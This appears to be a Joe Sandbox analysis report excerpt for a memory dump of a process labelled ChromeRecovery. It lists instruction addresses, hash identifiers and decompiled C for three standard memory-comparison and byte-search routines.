0x00c94d26
0x00c94791
0x00c94793
0x00c947a0
0x00c947a0
0x00000000
0x00c94793
0x00000000
0x00c94d26
0x00c94cbe
0x00c94cc0
0x00c94cda
0x00c94ce1
0x00000000
0x00c94ce1
0x00c94cca
0x00c94ccc
0x00000000
0x00000000
0x00c94cd6
0x00c94cd8
0x00c94cf2
0x00c94cf4
0x00c94cfd
0x00c94cfd
0x00000000
0x00c94cf4
0x00000000
0x00c94cd8
0x00c94c5d
0x00c94c5f
0x00c94c79
0x00c94c80
0x00000000
0x00c94c80
0x00c94c69
0x00c94c6b
0x00000000
0x00000000
0x00c94c75
0x00c94c77
0x00c94c91
0x00c94c93
0x00c94c9c
0x00c94c9c
0x00000000
0x00c94c93
0x00000000
0x00c94c77
0x00c94bfc
0x00c94bfe
0x00c94c18
0x00c94c1f
0x00000000
0x00c94c1f
0x00c94c08
0x00c94c0a
0x00000000
0x00000000
0x00c94c14
0x00c94c16
0x00c94c30
0x00c94c32
0x00c94c3b
0x00c94c3b
0x00000000
0x00c94c32
0x00000000
0x00c94c16
0x00c94b9a
0x00c94b9c
0x00c94bb6
0x00c94bbd
0x00000000
0x00c94bbd
0x00c94ba6
0x00c94ba8
0x00000000
0x00000000
0x00c94bb2
0x00c94bb4
0x00c94bce
0x00c94bd0
0x00c94bd9
0x00c94bd9
0x00000000
0x00c94bd0
0x00000000
0x00c94bb4
0x00c94b39
0x00c94b3b
0x00c94b55
0x00c94b5c
0x00000000
0x00c94b5c
0x00c94b45
0x00c94b47
0x00000000
0x00000000
0x00c94b51
0x00c94b53
0x00c94b6d
0x00c94b6f
0x00c94b78
0x00c94b78
0x00000000
0x00c94b6f
0x00000000
0x00c94b53
0x00c94ad8
0x00c94ada
0x00c94af4
0x00c94afb
0x00000000
0x00c94afb
0x00c94ae4
0x00c94ae6
0x00000000
0x00000000
0x00c94af0
0x00c94af2
0x00c94b0c
0x00c94b0e
0x00c94b17
0x00c94b17
0x00000000
0x00c94b0e
0x00000000
0x00c94af2
0x00c94a7b
0x00c94a83
0x00c94a85
0x00000000
0x00000000
0x00c94a87
0x00c94a8f
0x00c94a91
0x00c94aa3
0x00c94aab
0x00c94aad
0x00c94ab6
0x00c94ab6
0x00000000
0x00c94aad
0x00000000
0x00c94a91
0x00c944dd
0x00c944dd
0x00c94deb

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: fd2c01d176d1a1962013cb14033dc81e28c6467a27ccf6d721c55182876cd566
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 529182722090A34EDF2D463A857C93EFFE15B523A231A079DD4F2CB1C5EE14DA65E620

Uniqueness

Uniqueness Score: -1.00%

Function 00C944E5 Relevance: .2, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C944E5(void* __edx, void* __esi) {
				signed int _t128;
				signed char _t129;
				signed char _t130;
				signed char _t131;
				signed char _t132;
				signed char _t134;
				signed int _t175;
				void* _t195;
				void* _t198;
				void* _t202;
				void* _t206;
				void* _t210;
				void* _t214;
				void* _t218;
				void* _t221;

				_t221 = __esi;
				_t195 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t175 = 0;
					L9:
					if(_t175 != 0) {
						goto L1;
					}
					_t129 =  *(_t221 - 0x19);
					if(_t129 ==  *(_t195 - 0x19)) {
						_t175 = 0;
						L18:
						if(_t175 != 0) {
							goto L1;
						}
						_t130 =  *(_t221 - 0x15);
						if(_t130 ==  *(_t195 - 0x15)) {
							_t175 = 0;
							L27:
							if(_t175 != 0) {
								goto L1;
							}
							_t131 =  *(_t221 - 0x11);
							if(_t131 ==  *(_t195 - 0x11)) {
								_t175 = 0;
								L36:
								if(_t175 != 0) {
									goto L1;
								}
								_t132 =  *(_t221 - 0xd);
								if(_t132 ==  *(_t195 - 0xd)) {
									_t175 = 0;
									L45:
									if(_t175 != 0) {
										goto L1;
									}
									if( *(_t221 - 9) ==  *(_t195 - 9)) {
										_t175 = 0;
										L54:
										if(_t175 != 0) {
											goto L1;
										}
										_t134 =  *(_t221 - 5);
										if(_t134 ==  *(_t195 - 5)) {
											_t175 = 0;
											L63:
											if(_t175 == 0) {
												_t175 = ( *(_t221 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t175 != 0) {
													_t175 = (0 | _t175 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t198 = (_t134 & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
										if(_t198 != 0) {
											L59:
											_t175 = (0 | _t198 > 0x00000000) * 2 - 1;
											goto L63;
										}
										_t198 = ( *(_t221 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
										if(_t198 != 0) {
											goto L59;
										}
										_t198 = ( *(_t221 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
										if(_t198 == 0) {
											_t175 = ( *(_t221 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t175 != 0) {
												_t175 = (0 | _t175 > 0x00000000) * 2 - 1;
											}
											goto L63;
										}
										goto L59;
									}
									_t202 = ( *(_t221 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
									if(_t202 != 0) {
										L50:
										_t175 = (0 | _t202 > 0x00000000) * 2 - 1;
										goto L54;
									}
									_t202 = ( *(_t221 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
									if(_t202 != 0) {
										goto L50;
									}
									_t202 = ( *(_t221 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
									if(_t202 == 0) {
										_t175 = ( *(_t221 - 6) & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t175 != 0) {
											_t175 = (0 | _t175 > 0x00000000) * 2 - 1;
										}
										goto L54;
									}
									goto L50;
								}
								_t206 = (_t132 & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
								if(_t206 != 0) {
									L41:
									_t175 = (0 | _t206 > 0x00000000) * 2 - 1;
									goto L45;
								}
								_t206 = ( *(_t221 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
								if(_t206 != 0) {
									goto L41;
								}
								_t206 = ( *(_t221 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
								if(_t206 == 0) {
									_t175 = ( *(_t221 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t175 != 0) {
										_t175 = (0 | _t175 > 0x00000000) * 2 - 1;
									}
									goto L45;
								}
								goto L41;
							}
							_t210 = (_t131 & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
							if(_t210 != 0) {
								L32:
								_t175 = (0 | _t210 > 0x00000000) * 2 - 1;
								goto L36;
							}
							_t210 = ( *(_t221 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
							if(_t210 != 0) {
								goto L32;
							}
							_t210 = ( *(_t221 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
							if(_t210 == 0) {
								_t175 = ( *(_t221 - 0xe) & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t175 != 0) {
									_t175 = (0 | _t175 > 0x00000000) * 2 - 1;
								}
								goto L36;
							}
							goto L32;
						}
						_t214 = (_t130 & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
						if(_t214 != 0) {
							L23:
							_t175 = (0 | _t214 > 0x00000000) * 2 - 1;
							goto L27;
						}
						_t214 = ( *(_t221 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
						if(_t214 != 0) {
							goto L23;
						}
						_t214 = ( *(_t221 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
						if(_t214 == 0) {
							_t175 = ( *(_t221 - 0x12) & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t175 != 0) {
								_t175 = (0 | _t175 > 0x00000000) * 2 - 1;
							}
							goto L27;
						}
						goto L23;
					}
					_t218 = (_t129 & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
					if(_t218 != 0) {
						L14:
						_t175 = (0 | _t218 > 0x00000000) * 2 - 1;
						goto L18;
					}
					_t218 = ( *(_t221 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
					if(_t218 != 0) {
						goto L14;
					}
					_t218 = ( *(_t221 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
					if(_t218 == 0) {
						_t175 = ( *(_t221 - 0x16) & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t175 != 0) {
							_t175 = (0 | _t175 > 0x00000000) * 2 - 1;
						}
						goto L18;
					}
					goto L14;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi != 0) {
						L5:
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 - 1;
						goto L9;
					}
					__edi =  *(__esi - 0x1c) & 0x000000ff;
					__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
					if(__edi != 0) {
						goto L5;
					}
					__edi =  *(__esi - 0x1b) & 0x000000ff;
					__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
					if(__edi == 0) {
						__ecx =  *(__esi - 0x1a) & 0x000000ff;
						__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
						if(__ecx != 0) {
							__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
						}
						goto L9;
					}
					goto L5;
				}
				L1:
				_t128 = _t175;
				return _t128;
			}

0x00c944e5
0x00c944e5
0x00c944eb
0x00c9453c
0x00c9453e
0x00c94540
0x00000000
0x00000000
0x00c94542
0x00c94548
0x00c94599
0x00c9459b
0x00c9459d
0x00000000
0x00000000
0x00c945a3
0x00c945a9
0x00c945fa
0x00c945fc
0x00c945fe
0x00000000
0x00000000
0x00c94604
0x00c9460a
0x00c9465b
0x00c9465d
0x00c9465f
0x00000000
0x00000000
0x00c94665
0x00c9466b
0x00c946bc
0x00c946be
0x00c946c0
0x00000000
0x00000000
0x00c946cc
0x00c9471e
0x00c94720
0x00c94722
0x00000000
0x00000000
0x00c94728
0x00c9472e
0x00c9477f
0x00c94781
0x00c94783
0x00c94791
0x00c94793
0x00c947a0
0x00c947a0
0x00c94793
0x00000000
0x00c94783
0x00c94737
0x00c94739
0x00c94753
0x00c9475a
0x00000000
0x00c9475a
0x00c94743
0x00c94745
0x00000000
0x00000000
0x00c9474f
0x00c94751
0x00c9476b
0x00c9476d
0x00c94776
0x00c94776
0x00000000
0x00c9476d
0x00000000
0x00c94751
0x00c946d6
0x00c946d8
0x00c946f2
0x00c946f9
0x00000000
0x00c946f9
0x00c946e2
0x00c946e4
0x00000000
0x00000000
0x00c946ee
0x00c946f0
0x00c9470a
0x00c9470c
0x00c94715
0x00c94715
0x00000000
0x00c9470c
0x00000000
0x00c946f0
0x00c94674
0x00c94676
0x00c94690
0x00c94697
0x00000000
0x00c94697
0x00c94680
0x00c94682
0x00000000
0x00000000
0x00c9468c
0x00c9468e
0x00c946a8
0x00c946aa
0x00c946b3
0x00c946b3
0x00000000
0x00c946aa
0x00000000
0x00c9468e
0x00c94613
0x00c94615
0x00c9462f
0x00c94636
0x00000000
0x00c94636
0x00c9461f
0x00c94621
0x00000000
0x00000000
0x00c9462b
0x00c9462d
0x00c94647
0x00c94649
0x00c94652
0x00c94652
0x00000000
0x00c94649
0x00000000
0x00c9462d
0x00c945b2
0x00c945b4
0x00c945ce
0x00c945d5
0x00000000
0x00c945d5
0x00c945be
0x00c945c0
0x00000000
0x00000000
0x00c945ca
0x00c945cc
0x00c945e6
0x00c945e8
0x00c945f1
0x00c945f1
0x00000000
0x00c945e8
0x00000000
0x00c945cc
0x00c94551
0x00c94553
0x00c9456d
0x00c94574
0x00000000
0x00c94574
0x00c9455d
0x00c9455f
0x00000000
0x00000000
0x00c94569
0x00c9456b
0x00c94585
0x00c94587
0x00c94590
0x00c94590
0x00000000
0x00c94587
0x00000000
0x00c944ed
0x00c944ed
0x00c944f4
0x00c944f6
0x00c94510
0x00c94514
0x00c94517
0x00000000
0x00c94517
0x00c944f8
0x00c94500
0x00c94502
0x00000000
0x00000000
0x00c94504
0x00c9450c
0x00c9450e
0x00c94520
0x00c94528
0x00c9452a
0x00c94533
0x00c94533
0x00000000
0x00c9452a
0x00000000
0x00c9450e
0x00c944dd
0x00c944dd
0x00c94deb

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: ca2580e08546e3a038a81308b1a2c4387933707df4546f16c886b812806c38c6
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: AB9193722080E34ADF2D467E857C83EFFE15B523A131A079EE4F2CA1C5EE14D666D620

Uniqueness

Uniqueness Score: -1.00%

Function 00C9423B Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C9423B(void* __edx, void* __esi) {
				signed char _t121;
				void* _t122;
				signed char _t123;
				signed char _t124;
				signed char _t125;
				signed char _t127;
				signed char _t128;
				void* _t172;
				void* _t194;
				void* _t197;
				void* _t201;
				void* _t205;
				void* _t209;
				void* _t213;
				void* _t217;
				void* _t221;
				void* _t224;

				_t224 = __esi;
				_t194 = __edx;
				_t121 =  *(__esi - 0x1c);
				if(_t121 ==  *(__edx - 0x1c)) {
					_t172 = 0;
					L8:
					if(_t172 != 0) {
						L64:
						_t122 = _t172;
						return _t122;
					}
					_t123 =  *(_t224 - 0x18);
					if(_t123 ==  *(_t194 - 0x18)) {
						_t172 = 0;
						L17:
						if(_t172 != 0) {
							goto L64;
						}
						_t124 =  *(_t224 - 0x14);
						if(_t124 ==  *(_t194 - 0x14)) {
							_t172 = 0;
							L26:
							if(_t172 != 0) {
								goto L64;
							}
							_t125 =  *(_t224 - 0x10);
							if(_t125 ==  *(_t194 - 0x10)) {
								_t172 = 0;
								L35:
								if(_t172 != 0) {
									goto L64;
								}
								if( *(_t224 - 0xc) ==  *(_t194 - 0xc)) {
									_t172 = 0;
									L44:
									if(_t172 != 0) {
										goto L64;
									}
									_t127 =  *(_t224 - 8);
									if(_t127 ==  *(_t194 - 8)) {
										_t172 = 0;
										L53:
										if(_t172 != 0) {
											goto L64;
										}
										_t128 =  *(_t224 - 4);
										if(_t128 ==  *(_t194 - 4)) {
											_t172 = 0;
											L62:
											if(_t172 == 0) {
												_t172 = 0;
											}
											goto L64;
										}
										_t197 = (_t128 & 0x000000ff) - ( *(_t194 - 4) & 0x000000ff);
										if(_t197 != 0) {
											L58:
											_t172 = (0 | _t197 > 0x00000000) * 2 - 1;
											goto L62;
										}
										_t197 = ( *(_t224 - 3) & 0x000000ff) - ( *(_t194 - 3) & 0x000000ff);
										if(_t197 != 0) {
											goto L58;
										}
										_t197 = ( *(_t224 - 2) & 0x000000ff) - ( *(_t194 - 2) & 0x000000ff);
										if(_t197 == 0) {
											_t172 = ( *(_t224 - 1) & 0x000000ff) - ( *(_t194 - 1) & 0x000000ff);
											if(_t172 != 0) {
												_t172 = (0 | _t172 > 0x00000000) * 2 - 1;
											}
											goto L62;
										}
										goto L58;
									}
									_t201 = (_t127 & 0x000000ff) - ( *(_t194 - 8) & 0x000000ff);
									if(_t201 != 0) {
										L49:
										_t172 = (0 | _t201 > 0x00000000) * 2 - 1;
										goto L53;
									}
									_t201 = ( *(_t224 - 7) & 0x000000ff) - ( *(_t194 - 7) & 0x000000ff);
									if(_t201 != 0) {
										goto L49;
									}
									_t201 = ( *(_t224 - 6) & 0x000000ff) - ( *(_t194 - 6) & 0x000000ff);
									if(_t201 == 0) {
										_t172 = ( *(_t224 - 5) & 0x000000ff) - ( *(_t194 - 5) & 0x000000ff);
										if(_t172 != 0) {
											_t172 = (0 | _t172 > 0x00000000) * 2 - 1;
										}
										goto L53;
									}
									goto L49;
								}
								_t205 = ( *(_t224 - 0xc) & 0x000000ff) - ( *(_t194 - 0xc) & 0x000000ff);
								if(_t205 != 0) {
									L40:
									_t172 = (0 | _t205 > 0x00000000) * 2 - 1;
									goto L44;
								}
								_t205 = ( *(_t224 - 0xb) & 0x000000ff) - ( *(_t194 - 0xb) & 0x000000ff);
								if(_t205 != 0) {
									goto L40;
								}
								_t205 = ( *(_t224 - 0xa) & 0x000000ff) - ( *(_t194 - 0xa) & 0x000000ff);
								if(_t205 == 0) {
									_t172 = ( *(_t224 - 9) & 0x000000ff) - ( *(_t194 - 9) & 0x000000ff);
									if(_t172 != 0) {
										_t172 = (0 | _t172 > 0x00000000) * 2 - 1;
									}
									goto L44;
								}
								goto L40;
							}
							_t209 = (_t125 & 0x000000ff) - ( *(_t194 - 0x10) & 0x000000ff);
							if(_t209 != 0) {
								L31:
								_t172 = (0 | _t209 > 0x00000000) * 2 - 1;
								goto L35;
							}
							_t209 = ( *(_t224 - 0xf) & 0x000000ff) - ( *(_t194 - 0xf) & 0x000000ff);
							if(_t209 != 0) {
								goto L31;
							}
							_t209 = ( *(_t224 - 0xe) & 0x000000ff) - ( *(_t194 - 0xe) & 0x000000ff);
							if(_t209 == 0) {
								_t172 = ( *(_t224 - 0xd) & 0x000000ff) - ( *(_t194 - 0xd) & 0x000000ff);
								if(_t172 != 0) {
									_t172 = (0 | _t172 > 0x00000000) * 2 - 1;
								}
								goto L35;
							}
							goto L31;
						}
						_t213 = (_t124 & 0x000000ff) - ( *(_t194 - 0x14) & 0x000000ff);
						if(_t213 != 0) {
							L22:
							_t172 = (0 | _t213 > 0x00000000) * 2 - 1;
							goto L26;
						}
						_t213 = ( *(_t224 - 0x13) & 0x000000ff) - ( *(_t194 - 0x13) & 0x000000ff);
						if(_t213 != 0) {
							goto L22;
						}
						_t213 = ( *(_t224 - 0x12) & 0x000000ff) - ( *(_t194 - 0x12) & 0x000000ff);
						if(_t213 == 0) {
							_t172 = ( *(_t224 - 0x11) & 0x000000ff) - ( *(_t194 - 0x11) & 0x000000ff);
							if(_t172 != 0) {
								_t172 = (0 | _t172 > 0x00000000) * 2 - 1;
							}
							goto L26;
						}
						goto L22;
					}
					_t217 = (_t123 & 0x000000ff) - ( *(_t194 - 0x18) & 0x000000ff);
					if(_t217 != 0) {
						L13:
						_t172 = (0 | _t217 > 0x00000000) * 2 - 1;
						goto L17;
					}
					_t217 = ( *(_t224 - 0x17) & 0x000000ff) - ( *(_t194 - 0x17) & 0x000000ff);
					if(_t217 != 0) {
						goto L13;
					}
					_t217 = ( *(_t224 - 0x16) & 0x000000ff) - ( *(_t194 - 0x16) & 0x000000ff);
					if(_t217 == 0) {
						_t172 = ( *(_t224 - 0x15) & 0x000000ff) - ( *(_t194 - 0x15) & 0x000000ff);
						if(_t172 != 0) {
							_t172 = (0 | _t172 > 0x00000000) * 2 - 1;
						}
						goto L17;
					}
					goto L13;
				}
				_t221 = (_t121 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t221 != 0) {
					L4:
					_t172 = (0 | _t221 > 0x00000000) * 2 - 1;
					goto L8;
				}
				_t221 = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
				if(_t221 != 0) {
					goto L4;
				}
				_t221 = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
				if(_t221 == 0) {
					_t172 = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
					if(_t172 != 0) {
						_t172 = (0 | _t172 > 0x00000000) * 2 - 1;
					}
					goto L8;
				}
				goto L4;
			}

0x00c9423b
0x00c9423b
0x00c9423b
0x00c94241
0x00c94292
0x00c94294
0x00c94296
0x00c944dd
0x00c944dd
0x00c94deb
0x00c94deb
0x00c9429c
0x00c942a2
0x00c942f3
0x00c942f5
0x00c942f7
0x00000000
0x00000000
0x00c942fd
0x00c94303
0x00c94354
0x00c94356
0x00c94358
0x00000000
0x00000000
0x00c9435e
0x00c94364
0x00c943b5
0x00c943b7
0x00c943b9
0x00000000
0x00000000
0x00c943c5
0x00c94417
0x00c94419
0x00c9441b
0x00000000
0x00000000
0x00c94421
0x00c94427
0x00c94478
0x00c9447a
0x00c9447c
0x00000000
0x00000000
0x00c9447e
0x00c94484
0x00c944d5
0x00c944d7
0x00c944d9
0x00c944db
0x00c944db
0x00000000
0x00c944d9
0x00c9448d
0x00c9448f
0x00c944a9
0x00c944b0
0x00000000
0x00c944b0
0x00c94499
0x00c9449b
0x00000000
0x00000000
0x00c944a5
0x00c944a7
0x00c944c1
0x00c944c3
0x00c944cc
0x00c944cc
0x00000000
0x00c944c3
0x00000000
0x00c944a7
0x00c94430
0x00c94432
0x00c9444c
0x00c94453
0x00000000
0x00c94453
0x00c9443c
0x00c9443e
0x00000000
0x00000000
0x00c94448
0x00c9444a
0x00c94464
0x00c94466
0x00c9446f
0x00c9446f
0x00000000
0x00c94466
0x00000000
0x00c9444a
0x00c943cf
0x00c943d1
0x00c943eb
0x00c943f2
0x00000000
0x00c943f2
0x00c943db
0x00c943dd
0x00000000
0x00000000
0x00c943e7
0x00c943e9
0x00c94403
0x00c94405
0x00c9440e
0x00c9440e
0x00000000
0x00c94405
0x00000000
0x00c943e9
0x00c9436d
0x00c9436f
0x00c94389
0x00c94390
0x00000000
0x00c94390
0x00c94379
0x00c9437b
0x00000000
0x00000000
0x00c94385
0x00c94387
0x00c943a1
0x00c943a3
0x00c943ac
0x00c943ac
0x00000000
0x00c943a3
0x00000000
0x00c94387
0x00c9430c
0x00c9430e
0x00c94328
0x00c9432f
0x00000000
0x00c9432f
0x00c94318
0x00c9431a
0x00000000
0x00000000
0x00c94324
0x00c94326
0x00c94340
0x00c94342
0x00c9434b
0x00c9434b
0x00000000
0x00c94342
0x00000000
0x00c94326
0x00c942ab
0x00c942ad
0x00c942c7
0x00c942ce
0x00000000
0x00c942ce
0x00c942b7
0x00c942b9
0x00000000
0x00000000
0x00c942c3
0x00c942c5
0x00c942df
0x00c942e1
0x00c942ea
0x00c942ea
0x00000000
0x00c942e1
0x00000000
0x00c942c5
0x00c9424a
0x00c9424c
0x00c94266
0x00c9426d
0x00000000
0x00c9426d
0x00c94256
0x00c94258
0x00000000
0x00000000
0x00c94262
0x00c94264
0x00c9427e
0x00c94280
0x00c94289
0x00c94289
0x00000000
0x00c94280
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 5635f23a1551d76789e045c5f69facf008fc2db0bd12dbd1111b68db07cf3109
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 658184722080E34ADF2D467A857C93EFFE16B513A131A079EE4F2CA1D1EE14D666D620

Uniqueness

Uniqueness Score: -1.00%

Function 00C951B0 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C951B0(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x00c951b0
0x00c951b7
0x00c9520c
0x00c9520c
0x00c951b9
0x00c951b9
0x00c951bf
0x00c951c9
0x00c951e1
0x00c951e1
0x00c951e4
0x00c951f8
0x00c951f8
0x00c951fb
0x00000000
0x00c951fd
0x00c951fd
0x00c951fd
0x00c951ff
0x00c95204
0x00000000
0x00000000
0x00c95206
0x00c95209
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c95209
0x00000000
0x00c951fd
0x00c951e6
0x00c951f3
0x00c95212
0x00c95214
0x00c95222
0x00c9522b
0x00000000
0x00c9522d
0x00c95230
0x00c95232
0x00c9525c
0x00c95234
0x00c95234
0x00c95236
0x00c95256
0x00c95238
0x00c9523b
0x00c9523d
0x00c95250
0x00c9523f
0x00c95241
0x00000000
0x00c95243
0x00000000
0x00c95243
0x00c95241
0x00c9523d
0x00c95236
0x00c95232
0x00000000
0x00c9520d
0x00c9520d
0x00c9520d
0x00000000
0x00c951f7
0x00c951cb
0x00c951cb
0x00c951cb
0x00c951cd
0x00c951d2
0x00000000
0x00000000
0x00c951d4
0x00c951d7
0x00000000
0x00c951d9
0x00c951df
0x00000000
0x00000000
0x00000000
0x00000000
0x00c951df
0x00000000
0x00c951d7
0x00c95246
0x00c9524a
0x00c9524a
0x00c951c9
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 0d1f7d5ddb4a9f00fd5d56f3024a228b4950b6d03ff2aaa2441293d6a27d6c57
